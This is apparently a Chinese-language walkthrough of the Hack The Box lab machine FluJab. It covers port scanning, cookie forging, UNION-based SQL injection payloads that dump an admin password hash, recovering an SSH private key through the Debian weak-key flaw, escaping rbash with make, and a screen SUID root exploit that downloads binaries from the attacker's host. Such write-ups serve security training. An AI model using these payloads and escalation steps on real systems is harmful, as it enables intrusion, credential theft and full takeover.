基本信息

端口扫描

常规web端口,但HTTPS证书里很多域名:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
$ nmap -sC -sV 10.10.10.124

Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-27 14:51 CST
Nmap scan report for 10.10.10.124
Host is up (0.068s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE   VERSION
22/tcp   open  ssh?
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp   open  http      nginx
|_http-server-header: ClownWare Proxy
|_http-title: Did not follow redirect to https://10.10.10.124/
443/tcp  open  ssl/https ClownWare Proxy
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 301 Moved Permanently
|     Date: Thu, 27 May 2021 06:51:58 GMT
|     Content-Type: text/html
|     Content-Length: 178
|     Connection: close
|     Location: https://clownware.htb/cwerror_pages.php
|     Server: ClownWare Proxy
|     <html>
|     <head><title>301 Moved Permanently</title></head>
|     <body bgcolor="white">
|     <center><h1>301 Moved Permanently</h1></center>
|     <hr><center>nginx</center>
|     </body>
|     </html>
|   GetRequest:
|     HTTP/1.1 200 OK
|     Date: Thu, 27 May 2021 06:51:57 GMT
|     Content-Type: text/html; charset=UTF-8
|     Connection: close
|     Server: ClownWare Proxy
|     <!DOCTYPE html>
|     <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
|     <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
|     <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
|     <!--[if gt IE 8]><!-->
|     <html class="js" style="opacity: 1; visibility: visible;" lang="en-US"><!--<![endif]--><head>
|     <title>Direct IP access not allowed | ClownWare</title>
|     <meta charset="UTF-8">
|     <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
|     <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
|     <meta name="robots" content="noindex, nofollow">
|     <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1">
|     <link rel="stylesheet" id="cf_styles-css" href="index_files
|   HTTPOptions:
|     HTTP/1.1 405 Not Allowed
|     Date: Thu, 27 May 2021 06:51:58 GMT
|     Content-Type: text/html
|     Content-Length: 166
|     Connection: close
|     Server: ClownWare Proxy
|     <html>
|     <head><title>405 Not Allowed</title></head>
|     <body bgcolor="white">
|     <center><h1>405 Not Allowed</h1></center>
|     <hr><center>nginx</center>
|     </body>
|_    </html>
|_http-server-header: ClownWare Proxy
|_http-title: Direct IP access not allowed | ClownWare
| ssl-cert: Subject: commonName=ClownWare.htb/organizationName=ClownWare Ltd/stateOrProvinceName=LON/countryName=UK
| Subject Alternative Name: DNS:clownware.htb, DNS:sni147831.clownware.htb, DNS:*.clownware.htb, DNS:proxy.clownware.htb, DNS:console.flujab.htb, DNS:sys.flujab.htb, DNS:smtp.flujab.htb, DNS:vaccine4flu.htb, DNS:bestmedsupply.htb, DNS:custoomercare.megabank.htb, DNS:flowerzrus.htb, DNS:chocolateriver.htb, DNS:meetspinz.htb, DNS:rubberlove.htb, DNS:freeflujab.htb, DNS:flujab.htb
| Not valid before: 2018-11-28T14:57:03
|_Not valid after:  2023-11-27T14:57:03
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
| tls-nextprotoneg:
|_  http/1.1
8080/tcp open  ssl/http  nginx
|_http-server-header: ClownWare Proxy
|_http-title: Direct IP access not allowed | ClownWare
| ssl-cert: Subject: commonName=ClownWare.htb/organizationName=ClownWare Ltd/stateOrProvinceName=LON/countryName=UK
| Subject Alternative Name: DNS:clownware.htb, DNS:sni147831.clownware.htb, DNS:*.clownware.htb, DNS:proxy.clownware.htb, DNS:console.flujab.htb, DNS:sys.flujab.htb, DNS:smtp.flujab.htb, DNS:vaccine4flu.htb, DNS:bestmedsupply.htb, DNS:custoomercare.megabank.htb, DNS:flowerzrus.htb, DNS:chocolateriver.htb, DNS:meetspinz.htb, DNS:rubberlove.htb, DNS:freeflujab.htb, DNS:flujab.htb
| Not valid before: 2018-11-28T14:57:03
|_Not valid after:  2023-11-27T14:57:03
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
| tls-nextprotoneg:
|_  http/1.1
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port443-TCP:V=7.91%T=SSL%I=7%D=5/27%Time=60AF418D%P=x86_64-apple-darwin
SF:19.6.0%r(GetRequest,E1E,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Thu,\x2027\
SF:x20May\x202021\x2006:51:57\x20GMT\r\nContent-Type:\x20text/html;\x20cha
SF:rset=UTF-8\r\nConnection:\x20close\r\nServer:\x20ClownWare\x20Proxy\r\n
SF:\r\n<!DOCTYPE\x20html>\n<!--\[if\x20lt\x20IE\x207\]>\x20<html\x20class=
SF:\"no-js\x20ie6\x20oldie\"\x20lang=\"en-US\">\x20<!\[endif\]-->\n<!--\[i
SF:f\x20IE\x207\]>\x20\x20\x20\x20<html\x20class=\"no-js\x20ie7\x20oldie\"
SF:\x20lang=\"en-US\">\x20<!\[endif\]-->\n<!--\[if\x20IE\x208\]>\x20\x20\x
SF:20\x20<html\x20class=\"no-js\x20ie8\x20oldie\"\x20lang=\"en-US\">\x20<!
SF:\[endif\]-->\n<!--\[if\x20gt\x20IE\x208\]><!-->\n<html\x20class=\"js\"\
SF:x20style=\"opacity:\x201;\x20visibility:\x20visible;\"\x20lang=\"en-US\
SF:"><!--<!\[endif\]--><head>\n<title>Direct\x20IP\x20access\x20not\x20all
SF:owed\x20\|\x20ClownWare</title>\n<meta\x20charset=\"UTF-8\">\n<meta\x20
SF:http-equiv=\"Content-Type\"\x20content=\"text/html;\x20charset=UTF-8\">
SF:\n<meta\x20http-equiv=\"X-UA-Compatible\"\x20content=\"IE=Edge,chrome=1
SF:\">\n<meta\x20name=\"robots\"\x20content=\"noindex,\x20nofollow\">\n<me
SF:ta\x20name=\"viewport\"\x20content=\"width=device-width,initial-scale=1
SF:,maximum-scale=1\">\n<link\x20rel=\"stylesheet\"\x20id=\"cf_styles-css\
SF:"\x20href=\"index_files")%r(HTTPOptions,141,"HTTP/1\.1\x20405\x20Not\x2
SF:0Allowed\r\nDate:\x20Thu,\x2027\x20May\x202021\x2006:51:58\x20GMT\r\nCo
SF:ntent-Type:\x20text/html\r\nContent-Length:\x20166\r\nConnection:\x20cl
SF:ose\r\nServer:\x20ClownWare\x20Proxy\r\n\r\n<html>\r\n<head><title>405\
SF:x20Not\x20Allowed</title></head>\r\n<body\x20bgcolor=\"white\">\r\n<cen
SF:ter><h1>405\x20Not\x20Allowed</h1></center>\r\n<hr><center>nginx</cente
SF:r>\r\n</body>\r\n</html>\r\n")%r(FourOhFourRequest,186,"HTTP/1\.1\x2030
SF:1\x20Moved\x20Permanently\r\nDate:\x20Thu,\x2027\x20May\x202021\x2006:5
SF:1:58\x20GMT\r\nContent-Type:\x20text/html\r\nContent-Length:\x20178\r\n
SF:Connection:\x20close\r\nLocation:\x20https://clownware\.htb/cwerror_pag
SF:es\.php\r\nServer:\x20ClownWare\x20Proxy\r\n\r\n<html>\r\n<head><title>
SF:301\x20Moved\x20Permanently</title></head>\r\n<body\x20bgcolor=\"white\
SF:">\r\n<center><h1>301\x20Moved\x20Permanently</h1></center>\r\n<hr><cen
SF:ter>nginx</center>\r\n</body>\r\n</html>\r\n");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 192.72 seconds

80/443

直接访问80跳到443,ClownWare代理error页面:

ssl信息

得到的所有域名都加hosts:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
echo | openssl s_client -showcerts -servername 10.10.10.124 -connect 10.10.10.124:443 2>/dev/null | openssl x509 -inform pem -noout -text | grep DNS | tr "," "\n" | cut -d: -f2

clownware.htb
sni147831.clownware.htb
*.clownware.htb
proxy.clownware.htb
console.flujab.htb
sys.flujab.htb
smtp.flujab.htb
vaccine4flu.htb
bestmedsupply.htb
custoomercare.megabank.htb
flowerzrus.htb
chocolateriver.htb
meetspinz.htb
rubberlove.htb
freeflujab.htb
flujab.htb

兔子洞/入口点

就是一个个访问,排除,发现入口点freeflujab.htb和smtp.flujab.htb:

freeflujab.htb

访问freeflujab.htb会得到几个cookie:

Patient就是ip的md5,另外两个是base64:

smtp_config

Modus应该是控制config的:

直接访问这个路径是denied,但如果修改cookie,可以访问:

1
2
echo -n Configure=True | base64
Q29uZmlndXJlPVRydWU=

可以配置smtp服务器,格式存在前端校验,简单绕过,修改为自己的服务器:

1
sudo python -m smtpd -n -c DebuggingServer 10.10.14.5:25

这个可以修改配置成功,但应该还需要另一个地方触发调用:

注册

同样是修改cookie,注册,失败:

1
2
echo -n  a2ebd5abc8b9a8d2d57a510a9f24aad3=True | base64
YTJlYmQ1YWJjOGI5YThkMmQ1N2E1MTBhOWYyNGFhZDM9VHJ1ZQ==

remind

提醒功能可以根据ID发邮件提醒,应该可以触发前面修改的smtp,但需要知道一个有效的ID:

取消

取消功能没有校验,符合格式的ID即可:

注意邮件标题,Ref后面应该是还有东西的,因为我们给的ID不存在导致为空,这里可能SQL注入

SQL注入

简单的尝试,结合smtp log判断:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
nhsnum=NHS-012-345-6789'+UNION+SELECT+1,2,3,4,5;+--+-&submit=Cancel+Appointment
3

@@version
10.1.37-MariaDB-0+deb9u1

database()
vaccinations

'+UNION+select+1,2,TABLE_SCHEMA,4,5+FROM+INFORMATION_SCHEMA.COLUMNS;+--+-
MedStaff

# 修改偏移得到所有信息
'+UNION+SELECT+1,2,TABLE_SCHEMA,4,5+FROM+INFORMATION_SCHEMA.COLUMNS+LIMIT+0,1;+--+-
information_schema

# 所有表
'+UNION+SELECT+1,2,CONCAT(TABLE_SCHEMA,':',TABLE_NAME),4,5+FROM+INFORMATION_SCHEMA.COLUMNS+where+TABLE_SCHEMA='MedStaff'+LIMIT+0,1;+--+--

#  最终得到admin密码
' UNION SELECT 1,2,concat(loginname,':',password,':',access),4,5 FROM admin#
sysadm:a3e30cce47580888f1f185798aca22ff10be617f4a982d67643bb56448508602:sysadmin-console-01.flujab.htb
明文: th3doct0r

sysadmin

得到的域名同样加hosts访问:

1
2
sysadmin-console-01.flujab.htb
sysadm : th3doct0r

这个要8080端口(可能会因为Origin header得到403,burp里添加规则去掉这个header即可):

ssh keys

自带notepad功能,可以浏览文件,发现一些ssh公钥:

Debian-ssh

根据相关信息搜到是CVE-2008-0166,根据公钥得到私钥

1
2
3
awk '{print $2}' 0223269.pub| base64 -d | md5sum

dead0b5b829ea2e3d22f47a7cbde17a6  -

SSH & user flag

根据公钥得到md5,rsa 4096里有这个对应的私钥,但直接连接是reset

1
2
3
4
dead0b5b829ea2e3d22f47a7cbde17a6

ssh -i dead0b5b829ea2e3d22f47a7cbde17a6-23269 drno@10.10.10.124
kex_exchange_identification: read: Connection reset by peer

ssh_wl

修改配置文件,允许我们的ip(注意最后要有个空行,坑:

user.txt

然后就可以ssh登录,得到user.txt:

rbash to bash

默认的是rbash,很多命令不能用,可以转换成bash,修复下环境变量:

1
2
3
4
5
6
7
COMMAND='/bin/bash'
make -s --eval=$'x:\n\t-'"$COMMAND"
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

# 也可以登录时候指定bash,同样需要修复环境变量
ssh -i dead0b5b829ea2e3d22f47a7cbde17a6-23269 drno@10.10.10.124 -t bash
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

提权信息

suid发现两个screen:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
drno@flujab:~$ find / -user root -perm /4000 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/local/share/screen/screen
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/screen
/usr/bin/gpasswd
/usr/bin/sudo
/bin/su
/bin/umount
/bin/mount
/bin/ping
/bin/fusermount

搜到:

提权 & root flag

因为服务器没有gcc,所以需要本地编译后传上去,一步步运行得到root shell,读取root.txt(755问题用绝对路径解决:

1
2
3
4
5
6
7
8
9
10
wget http://10.10.14.5:7777/rootshell
wget http://10.10.14.5:7777/libhax.so

chmod +x *

cd /etc
umask 000 # because
/usr/local/share/screen/screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
/usr/local/share/screen/screen -ls # screen itself is setuid, so... 
/tmp/rootshell

参考资料